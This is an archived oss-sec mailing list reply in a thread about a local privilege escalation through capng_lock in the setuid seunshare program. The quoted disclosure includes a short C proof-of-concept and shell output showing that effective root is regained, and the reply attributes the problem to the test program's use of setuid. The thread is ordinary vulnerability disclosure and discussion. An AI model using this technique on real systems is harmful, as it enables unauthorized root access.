oss-sec mailing list archives
Re: local privilege escalation due to capng_lock as used in seunshare
From: Steve Grubb <sgrubb () redhat com>
Date: Tue, 29 Apr 2014 17:49:04 -0400
On Tuesday, April 29, 2014 02:20:47 PM Andy Lutomirski wrote:
cap-ng's capng_lock function is insecure, seunshare uses it, and seunshare is installed setuid root. This results in a setuid program like this: #include <sys/types.h> #include <unistd.h> #include <stdio.h> #include <err.h> int main() { if (setuid(getuid()) != 0) err(1, "setuid(getuid())");
If you do not want the saved uid to be available, you need to use setresuid. That removes it. I would classify this as a bug in the test program. -Steve
printf("Dropped privs; real uid is %lu and effective uid is %lu\n", (unsigned long)getuid(), (unsigned long)geteuid()); seteuid(0); /* Do something that risks executing untrusted code here */ if (geteuid() == 0) { printf("It's baaaack!\n"); } else { printf("Phew, safe.\n"); } return 0; } behaving like this: $ ./sesploit Dropped privs; real uid is 1000 and effective uid is 1000 Phew, safe. This is okay until an attacker does: $ seunshare -t . `realpath ./sesploit` Dropped privs; real uid is 1000 and effective uid is 1000 It's baaaack! newrole may have the same issue. This was described recently here: http://seclists.org/fulldisclosure/2014/Apr/262 and has been publicly disclosed in Red Hat's bugzilla for quite some time: https://bugzilla.redhat.com/show_bug.cgi?id=1035427 https://bugzilla.redhat.com/show_bug.cgi?id=885288 I believe that there is at least one setuid program that can be used as a vector and is widely installed. There's a patch here: https://bugzilla.redhat.com/attachment.cgi?id=829864
Current thread:
- local privilege escalation due to capng_lock as used in seunshare Andy Lutomirski (Apr 29)
- Re: local privilege escalation due to capng_lock as used in seunshare Steve Grubb (Apr 29)
- Re: local privilege escalation due to capng_lock as used in seunshare Solar Designer (Apr 29)
- Re: local privilege escalation due to capng_lock as used in seunshare Steve Grubb (Apr 29)
- Re: local privilege escalation due to capng_lock as used in seunshare Solar Designer (Apr 29)
- Re: local privilege escalation due to capng_lock as used in seunshare Steve Grubb (Apr 30)
- Re: local privilege escalation due to capng_lock as used in seunshare Andy Lutomirski (Apr 30)
- Re: Re: local privilege escalation due to capng_lock as used in seunshare Steve Grubb (Apr 30)
- Re: local privilege escalation due to capng_lock as used in seunshare Solar Designer (Apr 30)
- Re: local privilege escalation due to capng_lock as used in seunshare Solar Designer (Apr 30)
- Re: local privilege escalation due to capng_lock as used in seunshare Andy Lutomirski (Apr 30)
- Re: local privilege escalation due to capng_lock as used in seunshare Daniel J Walsh (May 01)
- Re: local privilege escalation due to capng_lock as used in seunshare Solar Designer (Apr 29)
- Re: local privilege escalation due to capng_lock as used in seunshare Steve Grubb (Apr 29)